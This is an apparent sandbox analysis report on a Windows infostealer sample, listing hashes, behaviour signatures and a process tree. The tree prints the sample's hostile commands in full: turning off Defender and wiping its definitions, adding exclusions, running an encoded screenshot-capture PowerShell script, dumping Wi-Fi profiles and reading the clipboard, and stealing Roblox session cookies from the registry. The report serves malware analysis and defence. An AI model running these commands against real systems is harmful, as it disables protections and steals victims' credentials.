Analysis

  • max time kernel
    10s
  • max time network
    117s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 04:10

General

  • Target

    CriticalFiles/StageSN.exe

  • Size

    6.0MB

  • MD5

    6827ad0bc2db5262ba83e58e489452c0

  • SHA1

    c7b04529a9ac85dd2fd6ea46cbc71a9841c0b207

  • SHA256

    d020e692f2f2d30280d169b8b4ec3285adbb1e9f27abb35db6c88bb1999e8a26

  • SHA512

    43bbb7353f7d48cf0dd90337b9e3aa507e1212ac1eb7bdd04711bf941f1f991d310bba553533bf369e18571bf08f570f5f8cb8a1dc0d683bff0da7c3708d7438

  • SSDEEP

    98304:07EtdFBCbamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RLOuAKVq0DwKyf:0yFIeeN/FJMIDJf0gsAGK4RauAKVFw5f

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 43 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe
    "C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe
      "C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4320
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‌   .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‌   .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3676
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3252
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1400
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2344
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1348
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3628
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1908
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1324
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1824
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2176
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2856
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4348
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3180
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1592
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:5172
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3724
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:5184
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4800
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5136
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3z3wn0nz\3z3wn0nz.cmdline"
                5⤵
                  PID:5760
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC35.tmp" "c:\Users\Admin\AppData\Local\Temp\3z3wn0nz\CSC1331DC27BF144699A0F78FB8577DB648.TMP"
                    6⤵
                      PID:6000
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5200
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:5452
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5384
                  • C:\Windows\system32\attrib.exe
                    attrib -r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:5488
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:5496
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:5628
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                      3⤵
                        PID:5540
                        • C:\Windows\system32\attrib.exe
                          attrib +r C:\Windows\System32\drivers\etc\hosts
                          4⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:5644
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:5660
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:5792
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            3⤵
                              PID:5700
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                4⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5816
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:5828
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:5904
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:5920
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:5980
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5084"
                                      3⤵
                                        PID:6132
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /F /PID 5084
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1264
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3992"
                                        3⤵
                                          PID:2696
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /F /PID 3992
                                            4⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2036
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5084"
                                          3⤵
                                            PID:4908
                                            • C:\Windows\system32\taskkill.exe
                                              taskkill /F /PID 5084
                                              4⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5312
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 384"
                                            3⤵
                                              PID:5332
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /F /PID 384
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5268
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 860"
                                              3⤵
                                                PID:5384
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /F /PID 860
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2428
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3992"
                                                3⤵
                                                  PID:5560
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    4⤵
                                                      PID:3180
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /F /PID 3992
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5272
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 428"
                                                    3⤵
                                                      PID:4348
                                                      • C:\Windows\system32\taskkill.exe
                                                        taskkill /F /PID 428
                                                        4⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5612
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 384"
                                                      3⤵
                                                        PID:4452
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          4⤵
                                                            PID:1324
                                                          • C:\Windows\system32\taskkill.exe
                                                            taskkill /F /PID 384
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5532
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 512"
                                                          3⤵
                                                            PID:5656
                                                            • C:\Windows\system32\taskkill.exe
                                                              taskkill /F /PID 512
                                                              4⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5688
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 860"
                                                            3⤵
                                                              PID:5584
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /F /PID 860
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5672
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 428"
                                                              3⤵
                                                                PID:5896
                                                                • C:\Windows\system32\taskkill.exe
                                                                  taskkill /F /PID 428
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5980
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 512"
                                                                3⤵
                                                                  PID:5920
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    taskkill /F /PID 512
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:6048
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  3⤵
                                                                    PID:2548
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4364
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:396
